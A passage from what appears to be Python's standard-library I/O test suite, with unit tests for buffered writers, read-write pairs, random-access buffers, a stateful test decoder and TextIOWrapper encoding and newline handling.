def test_writes_and_flushes(self):
self.check_writes(lambda bufio: bufio.flush())
def test_writes_and_seeks(self):
def _seekabs(bufio):
pos = bufio.tell()
bufio.seek(pos + 1, 0)
bufio.seek(pos - 1, 0)
bufio.seek(pos, 0)
self.check_writes(_seekabs)
def _seekrel(bufio):
pos = bufio.seek(0, 1)
bufio.seek(+1, 1)
bufio.seek(-1, 1)
bufio.seek(pos, 0)
self.check_writes(_seekrel)
def test_writes_and_truncates(self):
self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))
def test_write_non_blocking(self):
raw = self.MockNonBlockWriterIO()
bufio = self.tp(raw, 8)
self.assertEqual(bufio.write(b"abcd"), 4)
self.assertEqual(bufio.write(b"efghi"), 5)
# 1 byte will be written, the rest will be buffered
raw.block_on(b"k")
self.assertEqual(bufio.write(b"jklmn"), 5)
# 8 bytes will be written, 8 will be buffered and the rest will be lost
raw.block_on(b"0")
try:
bufio.write(b"opqrwxyz0123456789")
except self.BlockingIOError as e:
written = e.characters_written
else:
self.fail("BlockingIOError should have been raised")
self.assertEqual(written, 16)
self.assertEqual(raw.pop_written(),
b"abcdefghijklmnopqrwxyz")
self.assertEqual(bufio.write(b"ABCDEFGHI"), 9)
s = raw.pop_written()
# Previously buffered bytes were flushed
self.assertTrue(s.startswith(b"01234567A"), s)
def test_write_and_rewind(self):
raw = io.BytesIO()
bufio = self.tp(raw, 4)
self.assertEqual(bufio.write(b"abcdef"), 6)
self.assertEqual(bufio.tell(), 6)
bufio.seek(0, 0)
self.assertEqual(bufio.write(b"XY"), 2)
bufio.seek(6, 0)
self.assertEqual(raw.getvalue(), b"XYcdef")
self.assertEqual(bufio.write(b"123456"), 6)
bufio.flush()
self.assertEqual(raw.getvalue(), b"XYcdef123456")
def test_flush(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
bufio.flush()
self.assertEqual(b"abc", writer._write_stack[0])
def test_writelines(self):
l = [b'ab', b'cd', b'ef']
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_userlist(self):
l = UserList([b'ab', b'cd', b'ef'])
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_error(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
self.assertRaises(TypeError, bufio.writelines, [1, 2, 3])
self.assertRaises(TypeError, bufio.writelines, None)
self.assertRaises(TypeError, bufio.writelines, 'abc')
def test_destructor(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
del bufio
support.gc_collect()
self.assertEqual(b"abc", writer._write_stack[0])
def test_truncate(self):
# Truncate implicitly flushes the buffer.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
bufio.write(b"abcdef")
self.assertEqual(bufio.truncate(3), 3)
self.assertEqual(bufio.tell(), 6)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.read(), b"abc")
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes from many threads and test they were
# all flushed.
N = 1000
contents = bytes(range(256)) * N
sizes = cycle([1, 19])
n = 0
queue = deque()
while n < len(contents):
size = next(sizes)
queue.append(contents[n:n+size])
n += size
del contents
# We use a real file object because it allows us to
# exercise situations where the GIL is released before
# writing the buffer to the raw streams. This is in addition
# to concurrency issues due to switching threads in the middle
# of Python code.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
def f():
try:
while True:
try:
s = queue.popleft()
except IndexError:
return
bufio.write(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
bufio.close()
with self.open(support.TESTFN, "rb") as f:
s = f.read()
for i in range(256):
self.assertEqual(s.count(bytes([i])), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO()
bufio = self.tp(rawio, 5)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
self.assertRaises(OSError, bufio.write, b"abcdef")
def test_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), 8, 12)
def test_write_error_on_close(self):
raw = self.MockRawIO()
def bad_write(b):
raise OSError()
raw.write = bad_write
b = self.tp(raw)
b.write(b'spam')
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
class CBufferedWriterTest(BufferedWriterTest, SizeofTest):
tp = io.BufferedWriter
def test_constructor(self):
BufferedWriterTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.write, b"def")
def test_garbage_collection(self):
# C BufferedWriter objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends into gc.garbage instead
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.write(b"123xxx")
f.x = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"123xxx")
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedWriter"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedWriterTest(BufferedWriterTest):
tp = pyio.BufferedWriter
class BufferedRWPairTest(unittest.TestCase):
def test_constructor(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
def test_uninitialized(self):
pair = self.tp.__new__(self.tp)
del pair
pair = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.read, 0)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.write, b'')
pair.__init__(self.MockRawIO(), self.MockRawIO())
self.assertEqual(pair.read(0), b'')
self.assertEqual(pair.write(b''), 0)
def test_detach(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertRaises(self.UnsupportedOperation, pair.detach)
def test_constructor_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)
def test_constructor_with_not_readable(self):
class NotReadable(MockRawIO):
def readable(self):
return False
self.assertRaises(OSError, self.tp, NotReadable(), self.MockRawIO())
def test_constructor_with_not_writeable(self):
class NotWriteable(MockRawIO):
def writable(self):
return False
self.assertRaises(OSError, self.tp, self.MockRawIO(), NotWriteable())
def test_read(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read(3), b"abc")
self.assertEqual(pair.read(1), b"d")
self.assertEqual(pair.read(), b"ef")
pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO())
self.assertEqual(pair.read(None), b"abc")
def test_readlines(self):
pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO())
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"])
def test_read1(self):
# .read1() is delegated to the underlying reader object, so this test
# can be shallow.
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read1(3), b"abc")
def test_readinto(self):
for method in ("readinto", "readinto1"):
with self.subTest(method):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
data = byteslike(b'\0' * 5)
self.assertEqual(getattr(pair, method)(data), 5)
self.assertEqual(bytes(data), b"abcde")
def test_write(self):
w = self.MockRawIO()
pair = self.tp(self.MockRawIO(), w)
pair.write(b"abc")
pair.flush()
buffer = bytearray(b"def")
pair.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
pair.flush()
self.assertEqual(w._write_stack, [b"abc", b"def"])
def test_peek(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertTrue(pair.peek(3).startswith(b"abc"))
self.assertEqual(pair.read(3), b"abc")
def test_readable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.readable())
def test_writeable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.writable())
def test_seekable(self):
# BufferedRWPairs are never seekable, even if their readers and writers
# are.
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.seekable())
# .flush() is delegated to the underlying writer object and has been
# tested in the test_write method.
def test_close_and_closed(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
pair.close()
self.assertTrue(pair.closed)
def test_reader_close_error_on_close(self):
def reader_close():
reader_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertTrue(pair.closed)
self.assertFalse(reader.closed)
self.assertTrue(writer.closed)
def test_writer_close_error_on_close(self):
def writer_close():
writer_non_existing
reader = self.MockRawIO()
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('writer_non_existing', str(err.exception))
self.assertFalse(pair.closed)
self.assertTrue(reader.closed)
self.assertFalse(writer.closed)
def test_reader_writer_close_error_on_close(self):
def reader_close():
reader_non_existing
def writer_close():
writer_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('writer_non_existing', str(err.exception.__context__))
self.assertFalse(pair.closed)
self.assertFalse(reader.closed)
self.assertFalse(writer.closed)
def test_isatty(self):
class SelectableIsAtty(MockRawIO):
def __init__(self, isatty):
MockRawIO.__init__(self)
self._isatty = isatty
def isatty(self):
return self._isatty
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
self.assertFalse(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
def test_weakref_clearing(self):
brw = self.tp(self.MockRawIO(), self.MockRawIO())
ref = weakref.ref(brw)
brw = None
ref = None # Shouldn't segfault.
class CBufferedRWPairTest(BufferedRWPairTest):
tp = io.BufferedRWPair
class PyBufferedRWPairTest(BufferedRWPairTest):
tp = pyio.BufferedRWPair
class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
read_mode = "rb+"
write_mode = "wb+"
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
BufferedWriterTest.test_constructor(self)
def test_uninitialized(self):
BufferedReaderTest.test_uninitialized(self)
BufferedWriterTest.test_uninitialized(self)
def test_read_and_write(self):
raw = self.MockRawIO((b"asdf", b"ghjk"))
rw = self.tp(raw, 8)
self.assertEqual(b"as", rw.read(2))
rw.write(b"ddd")
rw.write(b"eee")
self.assertFalse(raw._write_stack) # Buffer writes
self.assertEqual(b"ghjk", rw.read())
self.assertEqual(b"dddeee", raw._write_stack[0])
def test_seek_and_tell(self):
raw = self.BytesIO(b"asdfghjkl")
rw = self.tp(raw)
self.assertEqual(b"as", rw.read(2))
self.assertEqual(2, rw.tell())
rw.seek(0, 0)
self.assertEqual(b"asdf", rw.read(4))
rw.write(b"123f")
rw.seek(0, 0)
self.assertEqual(b"asdf123fl", rw.read())
self.assertEqual(9, rw.tell())
rw.seek(-4, 2)
self.assertEqual(5, rw.tell())
rw.seek(2, 1)
self.assertEqual(7, rw.tell())
self.assertEqual(b"fl", rw.read(11))
rw.flush()
self.assertEqual(b"asdf123fl", raw.getvalue())
self.assertRaises(TypeError, rw.seek, 0.0)
def check_flush_and_read(self, read_func):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
self.assertEqual(b"ab", read_func(bufio, 2))
bufio.write(b"12")
self.assertEqual(b"ef", read_func(bufio, 2))
self.assertEqual(6, bufio.tell())
bufio.flush()
self.assertEqual(6, bufio.tell())
self.assertEqual(b"ghi", read_func(bufio))
raw.seek(0, 0)
raw.write(b"XYZ")
# flush() resets the read buffer
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"XYZ", read_func(bufio, 3))
def test_flush_and_read(self):
self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))
def test_flush_and_readinto(self):
def _readinto(bufio, n=-1):
b = bytearray(n if n >= 0 else 9999)
n = bufio.readinto(b)
return bytes(b[:n])
self.check_flush_and_read(_readinto)
def test_flush_and_peek(self):
def _peek(bufio, n=-1):
# This relies on the fact that the buffer can contain the whole
# raw stream, otherwise peek() can return less.
b = bufio.peek(n)
if n != -1:
b = b[:n]
bufio.seek(len(b), 1)
return b
self.check_flush_and_read(_peek)
def test_flush_and_write(self):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
bufio.write(b"123")
bufio.flush()
bufio.write(b"45")
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"12345fghi", raw.getvalue())
self.assertEqual(b"12345fghi", bufio.read())
def test_threads(self):
BufferedReaderTest.test_threads(self)
BufferedWriterTest.test_threads(self)
def test_writes_and_peek(self):
def _peek(bufio):
bufio.peek(1)
self.check_writes(_peek)
def _peek(bufio):
pos = bufio.tell()
bufio.seek(-1, 1)
bufio.peek(1)
bufio.seek(pos, 0)
self.check_writes(_peek)
def test_writes_and_reads(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.read(1)
self.check_writes(_read)
def test_writes_and_read1s(self):
def _read1(bufio):
bufio.seek(-1, 1)
bufio.read1(1)
self.check_writes(_read1)
def test_writes_and_readintos(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.readinto(bytearray(1))
self.check_writes(_read)
def test_write_after_readahead(self):
# Issue #6629: writing after the buffer was filled by readahead should
# first rewind the raw stream.
for overwrite_size in [1, 5]:
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 4)
# Trigger readahead
self.assertEqual(bufio.read(1), b"A")
self.assertEqual(bufio.tell(), 1)
# Overwriting should rewind the raw stream if it needs so
bufio.write(b"B" * overwrite_size)
self.assertEqual(bufio.tell(), overwrite_size + 1)
# If the write size was smaller than the buffer size, flush() and
# check that rewind happens.
bufio.flush()
self.assertEqual(bufio.tell(), overwrite_size + 1)
s = raw.getvalue()
self.assertEqual(s,
b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))
def test_write_rewind_write(self):
# Various combinations of reading / writing / seeking backwards / writing again
def mutate(bufio, pos1, pos2):
assert pos2 >= pos1
# Fill the buffer
bufio.seek(pos1)
bufio.read(pos2 - pos1)
bufio.write(b'\x02')
# This writes earlier than the previous write, but still inside
# the buffer.
bufio.seek(pos1)
bufio.write(b'\x01')
b = b"\x80\x81\x82\x83\x84"
for i in range(0, len(b)):
for j in range(i, len(b)):
raw = self.BytesIO(b)
bufio = self.tp(raw, 100)
mutate(bufio, i, j)
bufio.flush()
expected = bytearray(b)
expected[j] = 2
expected[i] = 1
self.assertEqual(raw.getvalue(), expected,
"failed result for i=%d, j=%d" % (i, j))
def test_truncate_after_read_or_write(self):
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 100)
self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled
self.assertEqual(bufio.truncate(), 2)
self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases
self.assertEqual(bufio.truncate(), 4)
def test_misbehaved_io(self):
BufferedReaderTest.test_misbehaved_io(self)
BufferedWriterTest.test_misbehaved_io(self)
def test_interleaved_read_write(self):
# Test for issue #12213
with self.BytesIO(b'abcdefgh') as raw:
with self.tp(raw, 100) as f:
f.write(b"1")
self.assertEqual(f.read(1), b'b')
f.write(b'2')
self.assertEqual(f.read1(1), b'd')
f.write(b'3')
buf = bytearray(1)
f.readinto(buf)
self.assertEqual(buf, b'f')
f.write(b'4')
self.assertEqual(f.peek(1), b'h')
f.flush()
self.assertEqual(raw.getvalue(), b'1b2d3f4h')
with self.BytesIO(b'abc') as raw:
with self.tp(raw, 100) as f:
self.assertEqual(f.read(1), b'a')
f.write(b"2")
self.assertEqual(f.read(1), b'c')
f.flush()
self.assertEqual(raw.getvalue(), b'a2c')
def test_interleaved_readline_write(self):
with self.BytesIO(b'ab\ncdef\ng\n') as raw:
with self.tp(raw) as f:
f.write(b'1')
self.assertEqual(f.readline(), b'b\n')
f.write(b'2')
self.assertEqual(f.readline(), b'def\n')
f.write(b'3')
self.assertEqual(f.readline(), b'\n')
f.flush()
self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')
# You can't construct a BufferedRandom over a non-seekable stream.
test_unseekable = None
class CBufferedRandomTest(BufferedRandomTest, SizeofTest):
tp = io.BufferedRandom
def test_constructor(self):
BufferedRandomTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_garbage_collection(self):
CBufferedReaderTest.test_garbage_collection(self)
CBufferedWriterTest.test_garbage_collection(self)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedRandom"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedRandomTest(BufferedRandomTest):
tp = pyio.BufferedRandom
# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
# undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
# last input byte is received.
# - The number of output characters can vary depending on previous input.
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
"""
For testing seek/tell behavior with a stateful, buffering decoder.
Input is a sequence of words. Words may be fixed-length (length set
by input) or variable-length (period-terminated). In variable-length
mode, extra periods are ignored. Possible words are:
- 'i' followed by a number sets the input length, I (maximum 99).
When I is set to 0, words are space-terminated.
- 'o' followed by a number sets the output length, O (maximum 99).
- Any other word is converted into a word followed by a period on
the output. The output word consists of the input word truncated
or padded out with hyphens to make its length equal to O. If O
is 0, the word is output verbatim without truncating or padding.
I and O are initially set to 1. When I changes, any buffered input is
re-scanned according to the new I. EOF also terminates the last word.
"""
def __init__(self, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors)
self.reset()
def __repr__(self):
return '<SID %x>' % id(self)
def reset(self):
self.i = 1
self.o = 1
self.buffer = bytearray()
def getstate(self):
i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset()
return bytes(self.buffer), i*100 + o
def setstate(self, state):
buffer, io = state
self.buffer = bytearray(buffer)
i, o = divmod(io, 100)
self.i, self.o = i ^ 1, o ^ 1
def decode(self, input, final=False):
output = ''
for b in input:
if self.i == 0: # variable-length, terminated with period
if b == ord('.'):
if self.buffer:
output += self.process_word()
else:
self.buffer.append(b)
else: # fixed-length, terminate after self.i bytes
self.buffer.append(b)
if len(self.buffer) == self.i:
output += self.process_word()
if final and self.buffer: # EOF terminates the last word
output += self.process_word()
return output
def process_word(self):
output = ''
if self.buffer[0] == ord('i'):
self.i = min(99, int(self.buffer[1:] or 0)) # set input length
elif self.buffer[0] == ord('o'):
self.o = min(99, int(self.buffer[1:] or 0)) # set output length
else:
output = self.buffer.decode('ascii')
if len(output) < self.o:
output += '-'*self.o # pad out with hyphens
if self.o:
output = output[:self.o] # truncate to output length
output += '.'
self.buffer = bytearray()
return output
codecEnabled = False
@classmethod
def lookupTestDecoder(cls, name):
if cls.codecEnabled and name == 'test_decoder':
latin1 = codecs.lookup('latin-1')
return codecs.CodecInfo(
name='test_decoder', encode=latin1.encode, decode=None,
incrementalencoder=None,
streamreader=None, streamwriter=None,
incrementaldecoder=cls)
# Register the previous decoder for testing.
# Disabled by default, tests will enable it.
codecs.register(StatefulIncrementalDecoder.lookupTestDecoder)
class StatefulIncrementalDecoderTest(unittest.TestCase):
"""
Make sure the StatefulIncrementalDecoder actually works.
"""
test_cases = [
# I=1, O=1 (fixed-length input == fixed-length output)
(b'abcd', False, 'a.b.c.d.'),
# I=0, O=0 (variable-length input, variable-length output)
(b'oiabcd', True, 'abcd.'),
# I=0, O=0 (should ignore extra periods)
(b'oi...abcd...', True, 'abcd.'),
# I=0, O=6 (variable-length input, fixed-length output)
(b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
# I=2, O=6 (fixed-length input < fixed-length output)
(b'i.i2.o6xyz', True, 'xy----.z-----.'),
# I=6, O=3 (fixed-length input > fixed-length output)
(b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
# I=0, then 3; O=29, then 15 (with longer output)
(b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
'a----------------------------.' +
'b----------------------------.' +
'cde--------------------------.' +
'abcdefghijabcde.' +
'a.b------------.' +
'.c.------------.' +
'd.e------------.' +
'k--------------.' +
'l--------------.' +
'm--------------.')
]
def test_decoder(self):
# Try a few one-shot test cases.
for input, eof, output in self.test_cases:
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(input, eof), output)
# Also test an unfinished decode, followed by forcing EOF.
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(b'oiabcd'), '')
self.assertEqual(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
def setUp(self):
self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def test_constructor(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
t.__init__(b, encoding="latin-1", newline="\r\n")
self.assertEqual(t.encoding, "latin-1")
self.assertEqual(t.line_buffering, False)
t.__init__(b, encoding="utf-8", line_buffering=True)
self.assertEqual(t.encoding, "utf-8")
self.assertEqual(t.line_buffering, True)
self.assertEqual("\xe9\n", t.readline())
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
def test_uninitialized(self):
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
del t
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
t.read, 0)
t.__init__(self.MockRawIO())
self.assertEqual(t.read(0), '')
def test_non_text_encoding_codecs_are_rejected(self):
# Ensure the constructor complains if passed a codec that isn't
# marked as a text encoding
# http://bugs.python.org/issue20404
r = self.BytesIO()
b = self.BufferedWriter(r)
with self.assertRaisesRegex(LookupError, "is not a text encoding"):
self.TextIOWrapper(b, encoding="hex")
def test_detach(self):
r = self.BytesIO()
b = self.BufferedWriter(r)
t = self.TextIOWrapper(b)
self.assertIs(t.detach(), b)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("howdy")
self.assertFalse(r.getvalue())
t.detach()
self.assertEqual(r.getvalue(), b"howdy")
self.assertRaises(ValueError, t.detach)
# Operations independent of the detached stream should still work
repr(t)
self.assertEqual(t.encoding, "ascii")
self.assertEqual(t.errors, "strict")
self.assertFalse(t.line_buffering)
def test_repr(self):
raw = self.BytesIO("hello".encode("utf-8"))
b = self.BufferedReader(raw)
t = self.TextIOWrapper(b, encoding="utf-8")
modname = self.TextIOWrapper.__module__
self.assertEqual(repr(t),
"<%s.TextIOWrapper encoding='utf-8'>" % modname)
raw.name = "dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
t.mode = "r"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' mode='r' encoding='utf-8'>" % modname)
raw.name = b"dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name=b'dummy' mode='r' encoding='utf-8'>" % modname)
t.buffer.detach()
repr(t) # Should not raise an exception
def test_recursive_repr(self):
# Issue #25455
raw = self.BytesIO()
t = self.TextIOWrapper(raw)
with support.swap_attr(raw, 'name', t):
try:
repr(t) # Should not crash
except RuntimeError:
pass
def test_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=True)
t.write("X")
self.assertEqual(r.getvalue(), b"") # No flush happened
t.write("Y\nZ")
self.assertEqual(r.getvalue(), b"XY\nZ") # All got flushed
t.write("A\rB")
self.assertEqual(r.getvalue(), b"XY\nZA\rB")
def test_default_encoding(self):
old_environ = dict(os.environ)
try:
# try to get a user preferred encoding different than the current
# locale encoding to check that TextIOWrapper() uses the current
# locale encoding and not the user preferred encoding
for key in ('LC_ALL', 'LANG', 'LC_CTYPE'):
if key in os.environ:
del os.environ[key]
current_locale_encoding = locale.getpreferredencoding(False)
b = self.BytesIO()
t = self.TextIOWrapper(b)
self.assertEqual(t.encoding, current_locale_encoding)
finally:
os.environ.clear()
os.environ.update(old_environ)
@support.cpython_only
def test_device_encoding(self):
# Issue 15989
import _testcapi
b = self.BytesIO()
b.fileno = lambda: _testcapi.INT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
b.fileno = lambda: _testcapi.UINT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
def test_encoding(self):
# Check the encoding attribute is always set, and valid
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="utf-8")
self.assertEqual(t.encoding, "utf-8")
t = self.TextIOWrapper(b)
self.assertIsNotNone(t.encoding)
codecs.lookup(t.encoding)
def test_encoding_errors_reading(self):
# (1) default
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.read)
# (2) explicit strict
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.read)
# (3) ignore
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore")
self.assertEqual(t.read(), "abc\n\n")
# (4) replace
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="replace")
self.assertEqual(t.read(), "abc\n\ufffd\n")
def test_encoding_errors_writing(self):
# (1) default
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.write, "\xff")
# (2) explicit strict
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.write, "\xff")
# (3) ignore
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abcdef\n")
# (4) replace
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="replace",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abc?def\n")
def test_newlines(self):
input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ]
tests = [
[ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ],
[ '', input_lines ],
[ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ],
[ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ],
[ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ],
]
encodings = (
'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
# Try a range of buffer sizes to test the case where \r is the last
# character in TextIOWrapper._pending_line.
for encoding in encodings:
# XXX: str.encode() should return bytes
data = bytes(''.join(input_lines).encode(encoding))
for do_reads in (False, True):
for bufsize in range(1, 10):
for newline, exp_lines in tests:
bufio = self.BufferedReader(self.BytesIO(data), bufsize)
textio = self.TextIOWrapper(bufio, newline=newline,
encoding=encoding)
if do_reads:
got_lines = []
while True:
c2 = textio.read(2)
if c2 == '':
break
self.assertEqual(len(c2), 2)
got_lines.append(c2 + textio.readline())
else:
got_lines = list(textio)
for got_line, exp_line in zip(got_lines, exp_lines):
self.assertEqual(got_line, exp_line)
self.assertEqual(len(got_lines), len(exp_lines))
def test_newlines_input(self):
testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
for newline, expected in [
